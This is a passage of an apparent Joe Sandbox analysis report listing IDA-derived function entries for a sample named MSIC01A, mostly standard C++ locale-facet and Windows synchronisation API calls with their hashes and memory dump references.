                                                                                                                                                                        • codecvt.LIBCPMT ref: 00F3D708
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D71F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 712880209-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4267F
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42689
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F426C3
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F426DA
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F426FA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E8DF
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E8E9
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • messages.LIBCPMT ref: 00F4E923
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E93A
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E95A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2750803064-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E84A
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E854
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • collate.LIBCPMT ref: 00F4E88E
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E8A5
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E8C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1007100420-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F429FD
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A07
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42A41
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42A58
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42A78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                        • Instruction ID: 9221d27173f021c500df3549786e5f7e8097008234ce23dbca46ad121f0cf331
                                                                                                                                                                        • Opcode Fuzzy Hash: b4bfa00f9b75752fd066a7383acd79acdccb639f2a7aedb8337a41436faceb93
                                                                                                                                                                        • Instruction Fuzzy Hash: E701DE31900229DBCB15EF64CC41ABE7BA1AF84760F250419FD10AB2D2CF7C9E06AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42968
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42972
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F429AC
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F429C3
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F429E3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                        • Instruction ID: 52a00d07e30ed0c8e20e179b87849d418ee17c12e2df70e341de320cda09da71
                                                                                                                                                                        • Opcode Fuzzy Hash: 38b473b293f0a1e5079636c7748f537a01530b71456fb1af62c08acac2922792
                                                                                                                                                                        • Instruction Fuzzy Hash: EF01DE31900619DBCB05FB64CC42ABE7BB0AF84760F250519FE10AB2D2DF789E01BB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EA9E
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EAA8
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F4EAE2
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EAF9
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EB19
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                        • Instruction ID: b281adae24c4db52aee324dac37c864dabc505fedf6089f21a348ff45e603692
                                                                                                                                                                        • Opcode Fuzzy Hash: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01C032D00619DBCB15EB649C41ABE7B71FF80760F240849F9056B2D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42A92
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A9C
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42AD6
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42AED
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42B0D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                        • Instruction ID: 834fc202669dd32b31d659a519762b42608f331e6528535959f4e4bf5d300d4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                        • Instruction Fuzzy Hash: FF01C031900619DFCB15FB649C41ABE7BA1AF84760F244819FE04AB2D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42B27
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42B31
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F42B6B
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42B82
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42BA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        • Opcode ID: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                        • Instruction ID: a2cdcb8d32d5493a3e35792572cd0b1e15385bb6ee44fb9f8c29c57560444de1
                                                                                                                                                                        • Opcode Fuzzy Hash: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D01C035900619DBCB15EB648C416BE7B71BF84730F250419F9046B3D2CFB89E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EB33
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EB3D
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • moneypunct.LIBCPMT ref: 00F4EB77
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EB8E
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EBAE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 419941038-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F42DBF
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42DD6
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 743221004-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                        • RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        • SetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D0C
                                                                                                                                                                        • ResetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D18
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3916383385-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000018,72A902E8,?,00000000), ref: 00F3BBA3
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BD7F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 3924972193-2658103896
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D3D2
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F4D46E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: %.0Lf$0123456789-
                                                                                                                                                                        • API String ID: 2544715827-3094241602
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D676
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F4D712
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789-$0123456789-
                                                                                                                                                                        • API String ID: 3042121994-2494171821
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F51761
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F517FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
